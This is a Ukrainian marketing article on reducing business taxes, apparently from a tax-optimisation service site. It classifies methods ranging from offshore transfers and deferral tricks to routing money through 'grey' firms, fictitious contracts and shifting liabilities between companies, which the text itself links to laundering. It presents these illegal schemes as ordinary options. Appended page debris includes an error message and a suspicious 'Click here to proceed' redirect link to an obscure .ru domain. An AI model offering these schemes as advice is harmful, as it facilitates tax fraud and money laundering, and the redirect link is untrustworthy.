Статьи

Шляхи зменшення податкових виплат

В цій статті пропонуємо Вам розібрати, що таке  мінімізація податків та оптимізація і в чому різниця, а також класифікацію шляхів, використовуючи які можна знизити податкові виплати.

Отже спочатку дамо визначення мінімізації.

Мінімізація – це зниження суми податків за рахунок використання механізмів, що дозволяють зменшити  суму всіх податків.

Оптимізація – це складний процес до якого входить планування та реалізація системи зниження сум податків, що потрібно перерахувати до бюджету, як складової частини економічної діяльності підприємства.

Результат оптимізації -  отримання додаткового економічного ефекту  від грошових коштів, які не були сплачені до бюджету. Але досягнення такого економічного ефекту  призводить  до  розширення податкової бази, оскільки зростає прибуток підприємства, а звідси зростає й сума податків, які потрібно сплачувати до бюджету.

Відмінною рисою  оптимізації є те, що неважливо які види податків сплачуються, наприклад, якщо видатки на податки повинні складати якусь певну суму, тому не суттєво скільки буде сплачено податку на прибуток або податку на додану вартість, в будь-якому випадку загальна сума податків, яка повинна бути перераховано до бюджету становить заплановану суму.

Якщо сказати простіше, то оптимізація оподаткування є незмінною складовою розвитку будь-якої  компанії, а мінімізація стає актуальною коли вже підприємство отримує прибуток і потрібно зменшити податкові виплати.

Тепер перейдемо до класифікації шляхів зниження податків.

Перший шлях це виведення готівки  в зону з меншим рівнем оподаткування. Це означає, що:

  •  грошові кошти виводяться  в інші країни, де умови оподаткування є значно м’якшими;
  • можна перевести  кошти   на суб’єкти господарювання, що перебуває на іншій системі оподаткування або на суб’єкт з пільговим оподаткуванням.

Застосування цих способів призводить до того, що грошові кошти не зникають з легального обігу і можуть бути повернені назад.

Другим шляхом є виведення грошових коштів із під оподаткування. Відбувається це все за рахунок:

  • збільшення видатків за рахунок виведення грошових коштів на сірі фірми;
  • перекидування податкових зобов’язань з одного підприємства на інше.

 Це варіанти мінімізації податкових виплат, коли грошові кошти в більшості випадків вилучаються з реального обігу, а введення їх знов у обіг це або відмивання прибутку або внесок  до статутного капіталу. В цих способах присутні фіктивні договори та фірми.

Також існує варіант переносу сплати податків на наступні податкові періоди. Цей спосіб має під собою наступне:

  • використання посередників для створення тимчасового розриву  між фактичними діями контрагентів  та податковими зобов’язаннями;
  • не завершення операцій, щоб мати змогу перенести  настання податкових подій;
  • початок здійснення операцій з наступною їх відміною.

Використання даних способів приводить до зниження податкового навантаження в короткостроковій перспективі, але в майбутньому це призведе до збільшення податкового навантаження.

Великим плюсом даних способів є те, що вони дозволяють вирішити одну  важливу задачу. Якщо у Вас велика компанія та Ви серйозно займаєтесь плануванням, то використовуючи дані способи у Вас є можливість регулювати суму, що має бути сплачена в бюджет, в залежності від показників діяльності Вашої компанії.

 В наступній статті продовжимо розгляд даної теми.

А якщо Ви плануєте збільшення прибутків Вашого підприємства за рахунок оптимізації оподаткування, то пропонуємо Вам скористатися для співпраці  компаніями з реального сектора економіки, які представлені на нашому  сайті ТаксОптима

comments powered by HyperComments
Шляхи зменшення податкових виплат | Оптимизация налогообложения

Ошибка

На сайте произошла непредвиденная ошибка. Пожалуйста, повторите попытку позже.
<body bgcolor="#ffffff" text="#000000"> <a href="http://ikmfyeurnamdjs.ru/rg-erdr.php?_rpo=t nhFexEw&_rdm=WUVQqf3NB1V4=9.N3&p=5f95%7C%40%7C5f95%7C%40%7CWUVQqf3NB1V4%3D9.N3%7C%40%7CfB%7C%40%7C%7C%40%7CZzAZAzFHF%7C%40%7Czbb%7C%40%7C39%7C%40%7C19c4NW4cGtAtAtzEGAATHbGG%7C%40%7Ct+nAGL7EI%7C%40%7CT+7hEEpub&ga=x87xzE0bKcnkKiqxKUCqE7sScGzL%2FX0xCjIJub1%2FMU8Dx4MGAhU7S8S3oCjd2sdAhgjpvJ1wpCFeH0%2FCsqxBe2Vw0%2BL8WazVGNsrwwAmVBiAJH%2F22nQfuV5j2Wf4In4RQjPIXcBUhWP8r%2FCowBnx7jm27g2VxbNkGrYzzuUldbU%3D&t=nfrm">Click here to proceed</a>. <script type="text/javascript">window.NREUM||(NREUM={});NREUM.info={"beacon":"bam.nr-data.net","licenseKey":"6bc175e1c8","applicationID":"514258586","transactionName":"blxaMRFVWEFSUENfWVcWbRcKG19cV1ZPGEZRSQ==","queueTime":0,"applicationTime":64,"atts":"QhtZR1lPS08=","errorBeacon":"bam.nr-data.net","agent":""}</script></body>